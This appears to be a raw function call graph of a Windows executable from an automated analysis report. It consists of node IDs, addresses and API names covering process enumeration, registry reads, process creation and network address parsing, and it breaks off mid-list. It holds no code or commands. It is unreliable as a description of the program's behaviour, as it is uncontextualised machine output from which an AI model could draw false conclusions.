API calls 105191->105297 105298 d9d380 105191->105298 105302 d91000 413 API calls 105191->105302 105304 ded12a 50 API calls 105191->105304 105305 dd8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105191->105305 105306 dae3a5 timeGetTime 105191->105306 105307 dd6f5b CreateToolhelp32Snapshot Process32FirstW 105191->105307 105294 dacf79 49 API calls 105192->105294 105193->105185 105202 e061f4 WaitForSingleObject 105198->105202 105203 e0620a CloseHandle 105198->105203 105200->105185 105202->105185 105202->105203 105203->105191 105204->105185 105205->105191 105207->105185 105208->105204 105209->105185 105210->105185 105213->105191 105215->105185 105217->105185 105218->105185 105221->105185 105222->105185 105224 d9e7fd 105223->105224 105225 d9e80f 105223->105225 105314 d9dcd0 105224->105314 105345 ddd520 86 API calls 4 library calls 105225->105345 105227 d9e806 105227->105185 105229 e098e8 105229->105229 105231 d9ea20 105230->105231 105232 d9fa40 413 API calls 105231->105232 105236 d9ea89 105231->105236 105234 e09919 105232->105234 105233 e099bc 105360 ddd520 86 API calls 4 library calls 105233->105360 105234->105236 105357 ddd520 86 API calls 4 library calls 105234->105357 105240 d9d3d2 48 API calls 105236->105240 105258 d9eb18 105236->105258 105263 d9ecd7 Mailbox 105236->105263 105237 d9d3d2 48 API calls 105239 e09997 105237->105239 105359 db1b2a 52 API calls __cinit 105239->105359 105242 e09963 105240->105242 105358 db1b2a 52 API calls __cinit 105242->105358 105243 e09d70 105369 dee2fb 413 API calls Mailbox 105243->105369 105245 d9d380 55 API calls 105245->105263 105247 e09ddf 105372 dec235 413 API calls Mailbox 105247->105372 105249 d9fa40 413 API calls 105249->105263 105250 d9342c 48 API calls 105250->105263 105251 e09e49 105374 ddd520 86 API calls 4 library calls 105251->105374 105252 e09dc2 105371 ddd520 86 API calls 4 library calls 105252->105371 105254 da14a0 48 API calls 105254->105263 105255 d9f56f 105261 d9ef0c Mailbox 105255->105261 105370 ddd520 86 API calls 4 library calls 105255->105370 105258->105237 105258->105263 105261->105185 105262 e09df7 105262->105261 105263->105233 105263->105243 105263->105245 105263->105247 105263->105249 105263->105250 105263->105251 105263->105252 105263->105254 105263->105255 105263->105261 105267 ddd520 86 API calls 105263->105267 105268 e09a3c 105263->105268 105353 d9d805 105263->105353 105361 dda3ee 48 API calls 105263->105361 105362 deede9 413 API calls 105263->105362 105367 dca599 InterlockedDecrement 105263->105367 105368 def4df 413 API calls 105263->105368 105267->105263 105363 ded154 48 API calls 105268->105363 105270 e09a48 105282 e0ee11 105280->105282 105284 daf390 105280->105284 105281 e0ee46 105282->105281 105283 e0ee28 TranslateAcceleratorW 105282->105283 105283->105284 105284->105185 105286 daed2c 105285->105286 105287 daed34 105285->105287 105286->105185 105287->105286 105288 daed5e IsDialogMessageW 105287->105288 105289 e0ebec GetClassLongW 105287->105289 105288->105286 105288->105287 105289->105287 105289->105288 105290->105185 105291->105165 105292->105169 105293->105173 105294->105185 105295->105185 105296->105191 105297->105191 105299 d9d38b 105298->105299 105300 d9d3b4 105299->105300 105375 d9d772 55 API calls 105299->105375 105300->105191 105302->105191 105303->105185 105304->105191 105305->105191 105306->105191 105376 dd79c2 105307->105376 105309 dd6fa4 Process32NextW 105310 dd7021 CloseHandle 105309->105310 105311 dd6fa0 _wcscat 105309->105311 105310->105191 105311->105309 105311->105310 105313 db1bc7 _W_store_winword 59 API calls 105311->105313 105382 db297d 105311->105382 105313->105311 105315 d9fa40 413 API calls 105314->105315 105316 d9dd0f _memmove 105315->105316 105317 d9e12b Mailbox 105316->105317 105318 e08dbe 105316->105318 105321 d9dd70 105316->105321 105323 db010a 48 API calls 105316->105323 105330 d9deb7 105316->105330 105340 d9df29 105316->105340 105324 db010a 48 API calls 105317->105324 105352 ddd520 86 API calls 4 library calls 105318->105352 105321->105227 105322 d9e051 105323->105316 105330->105317 105332 d9dec4 105330->105332 105333 e08d9e 105338 d9df64 105338->105227 105340->105322 105340->105333 105340->105338 105341 e08d76 105340->105341 105343 e08d51 105340->105343 105347 d95322 413 API calls 105340->105347 105345->105229 105347->105340 105354 d9d828 _memmove 105353->105354 105355 d9d815 105353->105355 105354->105263 105355->105354 105356 db010a 48 API calls 105355->105356 105356->105354 105357->105236 105358->105258 105359->105263 105360->105261 105361->105263 105362->105263 105363->105270 105367->105263 105368->105263 105369->105255 105370->105261 105371->105261 105372->105262 105374->105261 105375->105300 105377 dd79e9 105376->105377 105381 dd79d0 105376->105381 105386 db224a 58 API calls __wcstoi64 105377->105386 105380 dd79ef 105380->105311 105381->105377 105381->105380 105385 db22df GetStringTypeW __towlower_l 105381->105385 105385->105381 105386->105380 105413->104524 105414->104524 105415->103950 105416->103950 105417->103950 105418->103950 105419->103950 105420->103949 105421->103942 105422->103922 105423->103920 105424->103927 105425->103936 105427 dd7700 105426->105427 105438 dd76f9 _wcsncpy 105426->105438 105428 db010a 48 API calls 105427->105428 105429 dd7706 GetFileVersionInfoW 105428->105429 105430 dd7722 __NMSG_WRITE 105429->105430 105431 db010a 48 API calls 105430->105431 105433 dd7739 _wcscat _wcscmp _wcscpy _wcsstr 105431->105433 105432 db1bc7 _W_store_winword 59 API calls 105434 dd77f7 105432->105434 105436 dd7779 752A1560 105433->105436 105440 dd7793 _wcscat 105433->105440 105435 dd7827 752A1560 105434->105435 105434->105438 105437 dd783d _wcscmp 105435->105437 105435->105438 105436->105440 105437->105438 105441 db234b 80 API calls 3 library calls 105437->105441 105438->103976 105440->105432 105441->105438 105442->103995 105443->104002 105444->104002 105445->104021 105446->104013 105447->104002 105448->104009 105449->104032 105451 daf069 105450->105451 105452 daf057 105450->105452 105455 d9c4cd 48 API calls 105451->105455 105453 daf05d 105452->105453 105454 daf063 105452->105454 105456 d9a6d4 48 API calls 105453->105456 105457 d9a6d4 48 API calls 105454->105457 105464 dd64f5 105455->105464 105459 daf081 105456->105459 105460 dd668b 105457->105460 105458 dd6524 105458->104067 105485 d94c4f 105459->105485 105463 d94c4f 50 API calls 105460->105463 105466 dd6699 105463->105466 105464->105458 105510 dd649b ReadFile SetFilePointerEx 105464->105510 105511 d9bd2f 48 API calls _memmove 105464->105511 105472 dd66a9 Mailbox 105466->105472 105512 dd6765 50 API calls 105466->105512 105467 e049b2 105471 daf0a3 Mailbox 105471->104067 105472->104067 105474 d97c3a 105473->105474 105475 d97bfb 105473->105475 105476 d9c935 48 API calls 105474->105476 105477 db010a 48 API calls 105475->105477 105478 d97c0e 105476->105478 105477->105478 105478->104072 105479->104046 105480->104073 105481->104042 105482->104047 105483->104064 105484->104071 105486 daf324 48 API calls 105485->105486 105489 d94c60 105486->105489 105487 d94ca0 2 API calls 105487->105489 105488 d94c95 105488->105467 105491 d9c610 MultiByteToWideChar 105488->105491 105489->105487 105489->105488 105513 d94d29 105489->105513 105492 d9c638 105491->105492 105493 e024df 105491->105493 105495 db010a 48 API calls 105492->105495 105494 d9c4cd 48 API calls 105493->105494 105496 e024e7 105494->105496 105497 d9c64f MultiByteToWideChar 105495->105497 105502 d9a6f8 48 API calls 105496->105502 105498 d9c66c 105497->105498 105499 d9c6b7 105497->105499 105498->105499 105503 d9c675 105498->105503 105500 d9a2fb 48 API calls 105499->105500 105501 d9c6c3 105500->105501 105501->105471 105504 e024f6 105502->105504 105503->105496 105506 d9c686 105503->105506 105505 db010a 48 API calls 105504->105505 105507 e02518 105505->105507 105508 d9c68e _memmove 105506->105508 105509 db010a 48 API calls 105506->105509 105508->105471 105509->105508 105510->105464 105511->105464 105512->105472 105514 d94d3d 105513->105514 105515 e045cf 105513->105515 105522 d94d67 105514->105522 105516 d9a6f8 48 API calls 105515->105516 105518 e045da 105516->105518 105520 db010a 48 API calls 105518->105520 105519 d94d49 105519->105489 105521 e045ef _memmove 105520->105521 105523 d94d7d 105522->105523 105526 d94d78 _memmove 105522->105526 105524 db010a 48 API calls 105523->105524 105525 e04703 105523->105525 105524->105526 105526->105519 105528 d984a6 81 API calls 105527->105528 105529 def7db 105528->105529 105552 def81d Mailbox 105529->105552 105563 df0458 105529->105563 105531 defa7c 105532 defbeb 105531->105532 105537 defa86 105531->105537 105609 df0579 89 API calls Mailbox 105532->105609 105535 defbf8 105536 defc04 105535->105536 105535->105537 105536->105552 105576 def5fb 105537->105576 105538 d984a6 81 API calls 105544 def875 Mailbox 105538->105544 105543 defaba 105590 daf92c 105543->105590 105544->105531 105544->105538 105544->105552 105594 df28d9 48 API calls _memmove 105544->105594 105595 defc96 60 API calls 2 library calls 105544->105595 105547 defaee 105597 d93320 105547->105597 105548 defad4 105596 ddd520 86 API calls 4 library calls 105548->105596 105551 defadf GetCurrentProcess TerminateProcess 105551->105547 105552->104079 105553 defb05 105554 da14a0 48 API calls 105553->105554 105562 defb2f 105553->105562 105556 defb1e 105554->105556 105555 defc56 105555->105552 105557 da14a0 48 API calls 105557->105562 105561 d9d89e 50 API calls 105561->105562 105562->105555 105562->105557 105562->105561 105610 df0300 105 API calls _free 105562->105610 105564 d9b8a7 48 API calls 105563->105564 105565 df0473 CharLowerBuffW 105564->105565 105566 de267a 60 API calls 105565->105566 105567 df0494 105566->105567 105569 d9d3d2 48 API calls 105567->105569 105575 df04cf Mailbox 105567->105575 105570 df04ac 105569->105570 105571 d97f40 48 API calls 105570->105571 105573 df04c3 105571->105573 105572 df050b Mailbox 105572->105544 105574 d9a2fb 48 API calls 105573->105574 105574->105575 105575->105572 105611 defc96 60 API calls 2 library calls 105575->105611 105577 def616 105576->105577 105578 def66b 105576->105578 105579 db010a 48 API calls 105577->105579 105582 df0719 105578->105582 105581 def638 105579->105581 105580 db010a 48 API calls 105580->105581 105581->105578 105581->105580 105583 df0944 Mailbox 105582->105583 105589 df073c _strcat _wcscpy __NMSG_WRITE 105582->105589 105583->105543 105584 d9d00b 58 API calls 105584->105589 105585 d9cdb4 48 API calls 105585->105589 105586 d984a6 81 API calls 105586->105589 105587 db45ec 47 API calls _W_store_winword 105587->105589 105589->105583 105589->105584 105589->105585 105589->105586 105589->105587 105612 dd8932 50 API calls __NMSG_WRITE 105589->105612 105591 daf941 105590->105591 105592 daf9d9 select 105591->105592 105593 daf9a7 105591->105593 105592->105593 105593->105547 105593->105548 105594->105544 105595->105544 105596->105551 105598 d93334 105597->105598 105600 d93339 Mailbox 105597->105600 105599 d9342c 48 API calls 105598->105599 105599->105600 105606 d93347 105600->105606 105613 d9346e 48 API calls 105600->105613 105602 db010a 48 API calls 105604 d933d8 105602->105604 105603 d93422 105603->105553 105605 db010a 48 API calls 105604->105605 105607 d933e3 105605->105607 105606->105602 105606->105603 105607->105553 105607->105607 105609->105535 105610->105562 105611->105572 105612->105589 105613->105606 105614->104087 105616 d91990 105615->105616 105620 d919af _memmove 105615->105620 105619 db010a 48 API calls 105616->105619 105617 db010a 48 API calls 105618 d919c6 105617->105618 105618->104117 105619->105620 105620->105617 105621->104100 105622->104107 105623->104109 105632 deae3b 105624->105632 105627 dead05 Mailbox 105628 dead31 htons 105627->105628 105629 dead1b 105627->105629 105628->105629 105629->104132 105631 ddd7f2 105630->105631 105631->104139 105633 d9a6d4 48 API calls 105632->105633 105634 deae49 105633->105634 105637 deae79 WideCharToMultiByte 105634->105637 105636 deacf3 inet_addr 105636->105627 105638 deae9d 105637->105638 105639 deaea7 105637->105639 105640 daf324 48 API calls 105638->105640 105641 db010a 48 API calls 105639->105641 105644 deaea5 105640->105644 105642 deaeae WideCharToMultiByte 105641->105642 105643 daf2d0 48 API calls 105642->105643 105643->105644 105644->105636 105646 de6b25 GetWindowRect 105645->105646 105647 de6b42 105645->105647 105648 de6b5c 105646->105648 105647->105648 105649 de6b52 ClientToScreen 105647->105649 105648->104143 105648->104146 105649->105648 105651 da245f 105650->105651 105653 da2332 105650->105653 105651->104149 105652 da2480 105652->104149 105653->105652 105654 da246a 105653->105654 105655 da2419 105653->105655 105656 d9d89e 50 API calls 105654->105656 105657 db010a 48 API calls 105655->105657 105659 da2472 105656->105659 105658 da2420 105657->105658 105658->104149 105659->104149 105661 d9d89e 50 API calls 105660->105661 105662 d91a08 105661->105662 105663 d91a12 105662->105663 105664 e0db7d 105662->105664 105666 d984a6 81 API calls 105663->105666 105665 d97e53 48 API calls 105664->105665 105668 e0db8d 105665->105668 105667 d91a1f 105666->105667 105669 d9c935 48 API calls 105667->105669 105668->105668 105670 d91a2d 105669->105670 105671 d91dce 105670->105671 105672 d91de4 Mailbox 105671->105672 105673 e0db26 105672->105673 105675 d91dfd 105672->105675 105674 e0db2b IsWindow 105673->105674 105677 d91e51 105674->105677 105678 e0db3f 105674->105678 105676 d91e46 105675->105676 105679 d984a6 81 API calls 105675->105679 105676->105677 105681 e0db65 IsWindow 105676->105681 105677->104159 105677->104162 105756 d9200a 105678->105756 105682 d91e17 105679->105682 105681->105677 105681->105678 105703 d91f04 105682->105703 105684 d9197e 48 API calls 105684->105677 105687 d9c4cd 48 API calls 105686->105687 105688 dce2fe 105687->105688 105795 d9193b SendMessageTimeoutW 105688->105795 105690 dce305 105702 dce309 Mailbox 105690->105702 105796 dce390 105690->105796 105692 dce314 105693 db010a 48 API calls 105692->105693 105694 dce338 SendMessageW 105693->105694 105695 dce34e _strlen 105694->105695 105694->105702 105702->104165 105704 d91f1a Mailbox 105703->105704 105705 d9c935 48 API calls 105704->105705 105706 d91f3e 105705->105706 105707 d9c935 48 API calls 105706->105707 105708 d91f49 105707->105708 105709 d97e53 48 API calls 105708->105709 105710 d91f59 105709->105710 105711 d9d3d2 48 API calls 105710->105711 105712 d91f87 105711->105712 105713 d9d3d2 48 API calls 105712->105713 105714 d91f90 105713->105714 105715 d9d3d2 48 API calls 105714->105715 105716 d91f99 105715->105716 105717 d91fac 105716->105717 105718 e02569 105716->105718 105719 e02583 105717->105719 105721 d91fbe GetForegroundWindow 105717->105721 105760 dce4ea 60 API calls 3 library calls 105718->105760 105757 d92016 105756->105757 105758 db010a 48 API calls 105757->105758 105759 d92023 105758->105759 105759->105684 105760->105719 105795->105690 105802 d9193b SendMessageTimeoutW 105796->105802 105798 dce39a 105799 dce39e 105798->105799 105800 dce3a2 SendMessageW 105798->105800 105799->105692 105800->105692 105802->105798 105804 df23eb _memset 105803->105804 105805 df2428 105804->105805 105806 df2452 105804->105806 105807 d9cdb4 48 API calls 105805->105807 105808 d9cdb4 48 API calls 105806->105808 105812 df2476 105806->105812 105809 df2433 105807->105809 105811 df2448 105808->105811 105809->105812 105814 d9cdb4 48 API calls 105809->105814 105810 df24b0 105813 d984a6 81 API calls 105810->105813 105817 d9cdb4 48 API calls 105811->105817 105812->105810 105815 d9cdb4 48 API calls 105812->105815 105816 df24d4 105813->105816 105814->105811 105815->105810 105818 d93bcf 48 API calls 105816->105818 105817->105812 105819 df24de 105818->105819 105820 df24e8 105819->105820 105821 df25a1 105819->105821 105823 d984a6 81 API calls 105820->105823 105822 df25d3 GetCurrentDirectoryW 105821->105822 105824 d984a6 81 API calls 105821->105824 105825 db010a 48 API calls 105822->105825 105826 df24f9 105823->105826 105827 df25b8 105824->105827 105828 df25f8 GetCurrentDirectoryW 105825->105828 105829 d93bcf 48 API calls 105826->105829 105830 d93bcf 48 API calls 105827->105830 105831 df2605 105828->105831 105832 df2503 105829->105832 105833 df25c2 __NMSG_WRITE 105830->105833 105836 d9ca8e 48 API calls 105831->105836 105843 df263e 105831->105843 105834 d984a6 81 API calls 105832->105834 105833->105822 105833->105843 105835 df2514 105834->105835 105837 d93bcf 48 API calls 105835->105837 105838 df261e 105836->105838 105839 df251e 105837->105839 105840 d9ca8e 48 API calls 105838->105840 105841 d984a6 81 API calls 105839->105841 105844 df262e 105840->105844 105845 df252f 105841->105845 105842 df268a 105847 df274c CreateProcessW 105842->105847 105848 df26c1 105842->105848 105843->105842 105881 dda17a 8 API calls 105843->105881 105849 d9ca8e 48 API calls 105844->105849 105850 d93bcf 48 API calls 105845->105850 105861 df276b 105847->105861 105884 dcbc90 69 API calls 105848->105884 105849->105843 105853 df2539 105850->105853 105851 df2655 105882 dda073 8 API calls 105851->105882 105855 df256f GetSystemDirectoryW 105853->105855 105857 d984a6 81 API calls 105853->105857 105859 db010a 48 API calls 105855->105859 105856 df2670 105883 dda102 8 API calls 105856->105883 105860 df2550 105857->105860 105862 df2594 GetSystemDirectoryW 105859->105862 105863 d93bcf 48 API calls 105860->105863 105865 df27bd CloseHandle 105861->105865 105866 df2780 105861->105866 105862->105831 105864 df255a __NMSG_WRITE 105863->105864 105864->105831 105864->105855 105867 df27cb 105865->105867 105875 df27f5 105865->105875 105870 df2791 GetLastError 105866->105870 105885 dd9d09 CloseHandle Mailbox 105867->105885 105869 df27fb 105872 df27a5 105869->105872 105870->105872 105886 dd9b29 CloseHandle 105872->105886 105875->105869 105878 df2827 CloseHandle 105875->105878 105876 df1f2b 105876->103817 105878->105872 105880 df26df __NMSG_WRITE 105880->105861 105881->105851 105882->105856 105883->105842 105884->105880 105886->105876 105887->104184 105888->104186 105890 dadd89 105889->105890 105891 e04a7d FindFirstFileW 105889->105891 105890->103817 105892 e04a95 FindClose 105891->105892 105893 e04a8e 105891->105893 105893->105892 105895 d980f9 105894->105895 105896 d9816b 105894->105896 105895->105896 105898 d98105 105895->105898 105897 d9a2fb 48 API calls 105896->105897 105904 d9813a _memmove 105897->105904 105899 d98110 105898->105899 105900 d98163 105898->105900 105902 d9a6f8 48 API calls 105899->105902 105911 d97eda 48 API calls 105900->105911 105903 d9811a 105902->105903 105905 db010a 48 API calls 105903->105905 105904->104254 105905->105904 105907 db010a 48 API calls 105906->105907 105908 d9818f 105907->105908 105908->104254 105909->104254 105910->104203 105911->105904 105912->104307 105914 d9a9af 105913->105914 105917 d9a9ca 105913->105917 105915 d9b8a7 48 API calls 105914->105915 105916 d9a9b7 CharUpperBuffW 105915->105916 105916->105917 105917->104332 105919 d910f9 105918->105919 105920 e04c5a 105918->105920 105921 db010a 48 API calls 105919->105921 105922 d91100 105921->105922 105923 d91121 105922->105923 105952 d9113c 48 API calls 105922->105952 105923->104356 105925->104340 105926->104392 105927->104392 105928->104392 105929->104399 105930->104340 105934 d9d2df 105931->105934 105935 d9d30a 105931->105935 105932 d9d2e6 105932->105935 105953 d9d349 53 API calls 105932->105953 105934->105932 105954 d9d349 53 API calls 105934->105954 105935->104353 105935->104354 105937->104390 105938->104381 105939->104381 105940->104339 105941->104390 105942->104367 105943->104390 105944->104390 105945->104390 105946->104392 105947->104392 105948->104392 105949->104390 105950->104387 105951->104390 105952->105923 105953->105935 105954->105932 105955->104409 105956 e0bc25 105957 e0bc27 105956->105957 105960 dd79f8 SHGetFolderPathW 105957->105960 105959 e0bc30 105959->105959 105961 d97e53 48 API calls 105960->105961 105962 dd7a25 105961->105962 105962->105959 105963 e0c146 GetUserNameW 105964 e01eca 105969 dabe17 105964->105969 105968 e01ed9 105970 d9d3d2 48 API calls 105969->105970 105971 dabe85 105970->105971 105977 dac929 105971->105977 105973 dabf22 105974 dabf3e 105973->105974 105980 dac8b7 48 API calls _memmove 105973->105980 105976 db1b2a 52 API calls __cinit 105974->105976 105976->105968 105981 dac955 105977->105981 105980->105973 105982 dac948 105981->105982 105983 dac962 105981->105983 105982->105973 105983->105982 105984 dac969 RegOpenKeyExW 105983->105984 105984->105982 105985 dac983 RegQueryValueExW 105984->105985 105986 dac9b9 RegCloseKey 105985->105986 105987 dac9a4 105985->105987 105986->105982 105987->105986 105988 e01e8b 105993 dae44f 105988->105993 105992 e01e9a 105994 db010a 48 API calls 105993->105994 105995 dae457 105994->105995 105996 dae46b 105995->105996 106001 dae74b 105995->106001 106000 db1b2a 52 API calls __cinit 105996->106000 106000->105992 106002 dae463 106001->106002 106003 dae754 106001->106003 106005 dae47b 106002->106005 106033 db1b2a 52 API calls __cinit 106003->106033 106006 d9d3d2 48 API calls 106005->106006 106007 dae492 GetVersionExW 106006->106007 106008 d97e53 48 API calls 106007->106008 106009 dae4d5 106008->106009 106034 dae5f8 106009->106034 106012 dae617 48 API calls 106021 dae4e9 106012->106021 106015 e029f9 106016 dae55f GetCurrentProcess 106047 dae70e LoadLibraryA GetProcAddress 106016->106047 106017 dae576 106019 dae59e 106017->106019 106020 dae5ec GetSystemInfo 106017->106020 106041 dae694 106019->106041 106022 dae5c9 106020->106022 106021->106015 106038 dae6d1 106021->106038 106024 dae5dc 106022->106024 106025 dae5d7 FreeLibrary 106022->106025 106024->105996 106025->106024 106027 dae5e4 GetSystemInfo 106029 dae5be 106027->106029 106028 dae5b4 106044 dae437 106028->106044 106029->106022 106031 dae5c4 FreeLibrary 106029->106031 106031->106022 106033->106002 106035 dae601 106034->106035 106036 d9a2fb 48 API calls 106035->106036 106037 dae4dd 106036->106037 106037->106012 106048 dae6e3 106038->106048 106052 dae6a6 106041->106052 106045 dae694 2 API calls 106044->106045 106046 dae43f GetNativeSystemInfo 106045->106046 106046->106029 106047->106017 106049 dae55b 106048->106049 106050 dae6ec LoadLibraryA 106048->106050 106049->106016 106049->106017 106050->106049 106051 dae6fd GetProcAddress 106050->106051 106051->106049 106053 dae5ac 106052->106053 106054 dae6af LoadLibraryA 106052->106054 106053->106027 106053->106028 106054->106053 106055 dae6c0 GetProcAddress 106054->106055 106055->106053 106056 e01eed 106061 dae975 106056->106061 106058 e01f01 106077 db1b2a 52 API calls __cinit 106058->106077 106060 e01f0b 106062 db010a 48 API calls 106061->106062 106063 daea27 GetModuleFileNameW 106062->106063 106064 db297d __wsplitpath 47 API calls 106063->106064 106065 daea5b _wcsncat 106064->106065 106078 db2bff 106065->106078 106068 db010a 48 API calls 106069 daea94 _wcscpy 106068->106069 106070 d9d3d2 48 API calls 106069->106070 106071 daeacf 106070->106071 106081 daeb05 106071->106081 106073 daeae0 Mailbox 106073->106058 106074 daeada _wcscat __NMSG_WRITE _wcsncpy 106074->106073 106075 d9a4f6 48 API calls 106074->106075 106076 db010a 48 API calls 106074->106076 106075->106074 106076->106074 106077->106060 106095 dbaab9 106078->106095 106082 d9c4cd 48 API calls 106081->106082 106083 daeb14 RegOpenKeyExW 106082->106083 106084 e04b17 RegQueryValueExW 106083->106084 106085 daeb35 106083->106085 106086 e04b30 106084->106086 106087 e04b91 RegCloseKey 106084->106087 106085->106074 106088 db010a 48 API calls 106086->106088 106089 e04b49 106088->106089 106090 d94bce 48 API calls 106089->106090 106091 e04b53 RegQueryValueExW 106090->106091 106092 e04b86 106091->106092 106093 e04b6f 106091->106093 106092->106087 106094 d97e53 48 API calls 106093->106094 106094->106092 106096 dbaaca 106095->106096 106097 dbabc6 106095->106097 106096->106097 106101 dbaad5 106096->106101 106105 db889e 47 API calls __getptd_noexit 106097->106105 106099 dbabbb 106106 db7aa0 8 API calls __cftoe_l 106099->106106 106102 daea8a 106101->106102 106104 db889e 47 API calls __getptd_noexit 106101->106104 106102->106068 106104->106099 106105->106099 106106->106102 106107 da0ff7 106108 dae016 50 API calls 106107->106108 106109 da100d 106108->106109 106164 dae08f 106109->106164 106114 da105e 106120 d9c935 48 API calls 106114->106120 106115 da0119 106185 ddd520 86 API calls 4 library calls 106115->106185 106116 da1063 106184 ddd520 86 API calls 4 library calls 106116->106184 106118 da0dee 106122 d9d89e 50 API calls 106118->106122 106119 e0b772 106186 ddd520 86 API calls 4 library calls 106119->106186 106136 d9fbf1 Mailbox 106120->106136 106121 da0dfa 106125 d9d89e 50 API calls 106121->106125 106122->106121 106123 d9f6d0 413 API calls 106145 d9fad8 Mailbox _memmove 106123->106145 106124 d9c935 48 API calls 106124->106145 106126 da0e83 106125->106126 106131 d9caee 48 API calls 106126->106131 106127 d9d3d2 48 API calls 106127->106145 106128 dca599 InterlockedDecrement 106128->106145 106130 e0b7d2 106141 da10f1 Mailbox 106131->106141 106133 db1b2a 52 API calls __cinit 106133->106145 106137 da103d 106137->106136 106183 ddd520 86 API calls 4 library calls 106137->106183 106138 db010a 48 API calls 106138->106145 106139 d9fa40 413 API calls 106139->106145 106182 ddd520 86 API calls 4 library calls 106141->106182 106143 e0b583 106181 ddd520 86 API calls 4 library calls 106143->106181 106145->106114 106145->106115 106145->106116 106145->106118 106145->106119 106145->106121 106145->106123 106145->106124 106145->106126 106145->106127 106145->106128 106145->106133 106145->106136 106145->106137 106145->106138 106145->106139 106145->106141 106145->106143 106146 de013f 87 API calls 106145->106146 106147 daf03e 2 API calls 106145->106147 106148 df0bfa 129 API calls 106145->106148 106149 df1f19 132 API calls 106145->106149 106150 df804e 113 API calls 106145->106150 106151 df30ad 93 API calls 106145->106151 106152 df798d 109 API calls 106145->106152 106153 deb74b 413 API calls 106145->106153 106154 df17aa 87 API calls 106145->106154 106155 daef0d 94 API calls 106145->106155 106156 df10e5 82 API calls 106145->106156 106157 d950a3 49 API calls 106145->106157 106158 daf461 98 API calls 106145->106158 106159 de8065 55 API calls 106145->106159 106160 de9122 91 API calls 106145->106160 106161 dadd84 3 API calls 106145->106161 106162 de92c0 88 API calls 106145->106162 106163 d981c6 85 API calls 106145->106163 106176 da1620 59 API calls Mailbox 106145->106176 106177 deee52 82 API calls 2 library calls 106145->106177 106178 deef9d 90 API calls Mailbox 106145->106178 106179 ddb020 48 API calls 106145->106179 106180 dee713 413 API calls Mailbox 106145->106180 106146->106145 106147->106145 106148->106145 106149->106145 106150->106145 106151->106145 106152->106145 106153->106145 106154->106145 106155->106145 106156->106145 106157->106145 106158->106145 106159->106145 106160->106145 106161->106145 106162->106145 106163->106145 106165 d97b6e 48 API calls 106164->106165 106166 dae0b4 _wcscmp 106165->106166 106167 d9caee 48 API calls 106166->106167 106169 dae0e2 Mailbox 106166->106169 106168 e0b9c7 106167->106168 106187 d97b4b 48 API calls Mailbox 106168->106187 106169->106145 106171 e0b9d5 106172 d9d2d2 53 API calls 106171->106172 106173 e0b9e7 106172->106173 106174 d9d89e 50 API calls 106173->106174 106175 e0b9ec Mailbox 106173->106175 106174->106175 106175->106145 106176->106145 106177->106145 106178->106145 106179->106145 106180->106145 106181->106141 106182->106136 106183->106116 106184->106115 106185->106119 106186->106130 106187->106171 106188 d9e849 106191 da26c0 106188->106191 106190 d9e852 106192 da273b 106191->106192 106193 e0862d 106191->106193 106198 da2adc 106192->106198 106199 da277c 106192->106199 106205 da279a 106192->106205 106313 ddd520 86 API calls 4 library calls 106193->106313 106195 e0863e 106314 ddd520 86 API calls 4 library calls 106195->106314 106196 da27cf 106196->106195 106201 da27db 106196->106201 106197 da2a84 106208 d9d380 55 API calls 106197->106208 106312 d9d349 53 API calls 106198->106312 106232 da28f6 106199->106232 106308 d9d500 53 API calls __cinit 106199->106308 106203 da27ef 106201->106203 106217 e0865a 106201->106217 106206 da2806 106203->106206 106207 e086c9 106203->106207 106205->106196 106205->106197 106223 da2914 106205->106223 106209 d9fa40 413 API calls 106206->106209 106211 e08ac9 106207->106211 106214 d9fa40 413 API calls 106207->106214 106210 da2aab 106208->106210 106246 da281d 106209->106246 106213 d9d2d2 53 API calls 106210->106213 106329 ddd520 86 API calls 4 library calls 106211->106329 106213->106223 106215 e086ee 106214->106215 106219 d9d89e 50 API calls 106215->106219 106228 e0870a 106215->106228 106237 da29ec 106215->106237 106217->106207 106217->106237 106315 def211 413 API calls 106217->106315 106316 def4df 413 API calls 106217->106316 106218 e08980 106324 ddd520 86 API calls 4 library calls 106218->106324 106219->106228 106220 d9cdb4 48 API calls 106230 da296e 106220->106230 106223->106220 106224 da2836 106224->106211 106225 d9fa40 413 API calls 106224->106225 106249 da287c 106225->106249 106226 d9c935 48 API calls 106226->106224 106227 da28cc 106227->106232 106309 d9cf97 58 API calls 106227->106309 106235 e0878d 106228->106235 106317 d9346e 48 API calls 106228->106317 106230->106237 106238 da2984 106230->106238 106244 e08a97 106230->106244 106252 e089b4 106230->106252 106231 da28ac 106231->106227 106322 d9cf97 58 API calls 106231->106322 106243 da2900 106232->106243 106323 d9cf97 58 API calls 106232->106323 106234 e0883f 106320 dec235 413 API calls Mailbox 106234->106320 106235->106234 106236 e0882d 106235->106236 106318 dd4e71 53 API calls __cinit 106235->106318 106245 d9ca8e 48 API calls 106236->106245 106237->106190 106238->106244 106310 da41fc 84 API calls 106238->106310 106241 e08888 106241->106246 106247 e0888c 106241->106247 106243->106218 106243->106223 106244->106237 106328 d94b02 50 API calls 106244->106328 106245->106234 106246->106224 106246->106226 106246->106237 106321 ddd520 86 API calls 4 library calls 106247->106321 106249->106231 106249->106237 106255 d9fa40 413 API calls 106249->106255 106294 debf80 106252->106294 106254 da29b8 106256 e08a7e 106254->106256 106311 da41fc 84 API calls 106254->106311 106262 e088ff 106255->106262 106327 daee93 84 API calls 106256->106327 106257 e08725 106257->106236 106270 da14a0 48 API calls 106257->106270 106259 e08813 106267 d9d89e 50 API calls 106259->106267 106260 e087ca 106260->106259 106265 d984a6 81 API calls 106260->106265 106262->106237 106268 d9d89e 50 API calls 106262->106268 106264 e089f3 106275 e08a01 106264->106275 106276 e08a42 106264->106276 106282 e087e0 106265->106282 106266 da29ca 106266->106237 106271 e08a6f 106266->106271 106272 da29e5 106266->106272 106269 e08821 106267->106269 106268->106231 106273 d9d89e 50 API calls 106269->106273 106274 e0875d 106270->106274 106326 ded1da 50 API calls 106271->106326 106279 db010a 48 API calls 106272->106279 106273->106236 106274->106236 106283 da14a0 48 API calls 106274->106283 106280 d9ca8e 48 API calls 106275->106280 106277 d9d89e 50 API calls 106276->106277 106281 e08a4b 106277->106281 106279->106237 106280->106237 106284 d9d89e 50 API calls 106281->106284 106282->106259 106319 dda76d 49 API calls 106282->106319 106286 e08775 106283->106286 106287 e08a57 106284->106287 106289 d9d89e 50 API calls 106286->106289 106325 d94b02 50 API calls 106287->106325 106288 e08807 106291 d9d89e 50 API calls 106288->106291 106292 e08781 106289->106292 106291->106259 106293 d9d89e 50 API calls 106292->106293 106293->106235 106299 debfd9 _memset 106294->106299 106296 